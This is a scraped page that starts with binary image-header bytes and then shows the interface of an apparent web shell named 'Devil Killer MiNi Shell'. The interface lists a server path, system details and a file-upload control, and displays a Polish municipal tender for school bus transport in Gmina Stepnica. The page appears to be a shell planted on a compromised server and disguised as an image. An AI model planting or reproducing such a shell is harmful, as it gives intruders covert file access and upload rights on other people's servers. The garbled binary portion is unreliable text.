JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230707/0029566501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewozy szkolne w ramach regularnej komunikacji zbiorowej w okresie od 1 września 2023 r. do 30 czerwca 2024 r. na terenie Gminy Stepnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stepnica</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684338</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Kościuszki 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stepnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-112</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">914188521</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@stepnica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.stepnica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewozy szkolne w ramach regularnej komunikacji zbiorowej w okresie od 1 września 2023 r. do 30 czerwca 2024 r. na terenie Gminy Stepnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4204506a-1ca3-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00295665</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00080333/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przewozy szkolne w ramach regularnej komunikacji zbiorowej w roku od 1 września 2023 r. do 30 czerwca 2024 r. na terenie Gminy Stepnica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://stepnica.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://stepnica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu platformy komercyjnej Marketplanet https://stepnica.ezamawiajacy.pl,<br/>2. Wykonawca w celu złożenia oferty w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na https://stepnica.ezamawiajacy.pl.<br/>3. Złożenie oferty, pod rygorem nieważności następuje w formie elektronicznej wyłącznie za<br/>pośrednictwem dedykowanego formularza pn. „Formularz do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na https://stepnica.ezamawiajacy.pl,<br/>4. Celem skrócenia czasu udzielania odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje<br/>przekazywane są w formie elektronicznej za pośrednictwem https://stepnica.ezamawiajacy.pl i<br/>formularza „Wyślij wiadomość do zamawiającego”.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Instrukcji użytkowania sytemu https://stepnica.ezamawiajacy.pl.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>7. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w Rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. Z 2020r., poz. 2452);<br/>Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. Z 2020r., poz. 2415).<br/>8. Osobami upoważnionymi ze strony Zamawiającego do porozumiewania się z Wykonawcami są w<br/>kwestiach formalnych: Pani Marlena Smolarek, w godzinach pracy Urzędu. Jednocześnie<br/>Zamawiający informuje, że przepisy ustawy PZP nie pozwalają na jakikolwiek inny kontakt – zarówno z<br/>Zamawiającym jak i osobami uprawnionymi do porozumiewania się z Wykonawcami – niż wskazany w<br/>niniejszym rozdziale SWZ. Oznacza to, że Zamawiający nie będzie reagował na inne formy<br/>kontaktowania się z nim, w szczególności na kontakt telefoniczny lub/i osobistyw swojej siedzibie.<br/>9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia:<br/>1) akceptuje warunki korzystania z platformy https://stepnica.ezamawiajacy.pl określone w<br/>Regulaminie platformy,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnych na platformie.<br/>10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z platformy https://stepnica.ezamawiajacy.pl.<br/>11. Zalecenia<br/>1) formaty plików wykorzystywanych przez wykonawców powinny być zgodne z<br/>„OBWIESZCZENIAPREZESA RADY MINISTRÓW z dnia 9 listopada 2017r. w sprawie ogłoszenia<br/>jednolitego tekstu<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych.”,<br/>2) zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf,<br/>3) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów<br/>.zip lub .7Z,<br/>4) wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie. Pozostałe warunki z uwagi na brak miejsca w systemie<br/>umieszczono w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Urząd Miasta i Gminy w Stepnicy, 72-112<br/>Stepnica, ul. T. Kościuszki 4, reprezentowany przez Burmistrza Miasta i Gminy w Stepnicy,<br/>2. Kontakt do Inspektora Ochrony Danych – iod@stepnica.pl, tel. 504707087.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z zapytaniem ofertowym dotyczącym przedmiotowego postępowania.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ust. 1 Ustawy z dnia 11 września<br/>2019r. Prawo zamówień publicznych (zw. dalej ustawą PZP).<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy PZP.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Posiada Pani/Pan:<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych.<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO<br/>9. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje o ograniczeniach stosowania<br/>przepisów RODO o których mowa w art.19 ust 2 i 3 ustawy Pzp, a mianowicie:<br/>a) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art.16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp;<br/>b) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art.18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AOŚ.271.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 149125,67 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są przewozy dzieci, do Szkoły Podstawowej im. ks. J. Twardowskiego w Racimierzu, Zespołu Szkolno - Przedszkolnego im. Konstantego Maciejewicz w Stepnicy w roku szkolnym 2023/2024, na podstawie biletów miesięcznych szkolnych (ulgowych). Przewidywana liczba biletów 63 szt.<br/>Przewozy obejmują wyjazd ze wskazanego przez zamawiającego miejsca, przejazd wyznaczoną trasą, przybycie do wyznaczonej szkoły w odpowiednim czasie przed rozpoczęciem zajęć lekcyjnych, oraz odwiezienie uczniów po zajęciach do miejscowości w których mieszkają. Wyszczególnienie tras i godzin dowozu i odwozu do szkół oraz liczbę uczniów przedstawia harmonogram przewozów szkolnych na terenie Gminy Stepnica od 1 września 2023 r. do 30 czerwca 2024 r. stanowiący załącznik nr 1a do specyfikacji, nie ujęto jednak miejscowości Budzień, ponieważ godzinę dowozu i odwozu uczniów z tej miejscowości należy ustalić z Dyrektorem Zespołu Szklono – Przedszkolnego w Stepnicy po podpisaniu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-01 do 2024-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert złożonych w postępowaniu na podstawie następujących kryteriów oceny:<br/>1)	cena oferty brutto - 60%; oferta będzie oceniana wg następującego wzoru:<br/>C min<br/>Kc = ------------------- x 60<br/>C bad<br/>gdzie:<br/>K c – kryterium cenowe<br/>C min – cena najtańszej oferty <br/>C bad – cena badanej oferty <br/>Dla porównania ofert pod względem kryterium cenowego Zamawiający przyjmuje cenę ofertową brutto;<br/>2)	jakość – czas podstawienia pojazdu zastępczego w razie awarii pojazdu (od wystąpienia awarii) waga 40% maksymalnie 40 punktów do zdobycia. <br/>J - liczba punktów przyznanych Wykonawcy w kryterium jakość:<br/>a)	czas podstawienia pojazdu zastępczego do 30 min. od wystąpienia awarii – 40 pkt,<br/>b)	czas podstawienia pojazdu zastępczego od 31 min. do 60 min. od wystąpienia awarii – 20 pkt,<br/>c)	czas podstawienia pojazdu zastępczego od 61 min. do 90 min. od wystąpienia awarii – 0 pkt<br/>Ocenie zostanie poddany aspekt jakościowy. Czas podstawienia pojazdu zastępczego nie może być dłuższy niż 90 min. W formularzu ofertowym należy podać czas podstawienia autobusu zastępczego w przedziałach powyżej, poprzez skreślenie niepotrzebnych przedziałów czasowych. W przypadku wstawienia większej ilości minut niż 90 – oferta zostanie odrzucona jako niezgodna z SIWZ. Punkty w ramach tego kryterium zostaną przyznane na podstawie wypełnionego przez Wykonawcę oświadczenia w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ. <br/>2.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą ilość punktów w skali 100 punktowej obliczonych wg następującego wzoru:<br/>X= Kc+J<br/>gdzie:<br/>X	-	ilość punktów badanej oferty;<br/>Kc	-	ilość punktów badanej oferty w kryterium cena ;<br/>J	-	ilość punktów badanej oferty w kryterium jakość<br/>3. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">podstawienia pojazdu zastępczego w razie awarii pojazdu (od wystąpienia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielnie zamówienia w niniejszym postępowaniu zgodnie z art. 112 ust. 2 PZP mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu w następującym zakresie:<br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony jeśli: <br/>a)	Wykonawca wykaże, że posiada aktualną licencję/zezwolenie zezwalającą na wykonanie krajowego transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2022r. poz. 2201) <br/>3)	Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.<br/>4)	Zdolność techniczna lub zawodowa<br/>Zamawiający nie precyzuje w tym zakresie żadnych szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. W celu potwierdzenia<br/>braku podstaw do wykluczenia wykonawcy z<br/>udziału w postępowaniu, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona,<br/>do złożenia w wyznaczonym terminie zgodnie z art. 274 ust. 1 ustawy PZP, aktualnych na dzień<br/>złożenia:<br/>1) Odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem.<br/>2) Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy PZP, w zakresie podstaw do wykluczenia ust. 1 pkt 3-6 oraz art. 109 ust. 1 pkt 1<br/>ustawy PZP wg wzoru stanowiącego załącznik nr 4 do SWZ.<br/>3) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do<br/>tej samej grupy kapitałowej wg wzoru stanowiącego załącznik nr 5 do SWZ.<br/>4)	Licencję aktualną licencję/zezwolenie zezwalającą na wykonanie krajowego transportu drogowego osób zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2022r. poz. 2201)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do<br/>oferty sporządzonej w oparciu o Formularz oferty Wykonawca zobowiązany jest dołączyć w<br/>formie elektronicznej aktualne na dzień składania ofert, oświadczenie stanowiące wstępne<br/>potwierdzenie, że Wykonawca:<br/>1) nie podlega wykluczeniu,<br/>2) spełnia warunki udziału w postępowaniu<br/>Należy dołączyć oświadczenie wstępne zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, ze<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. W 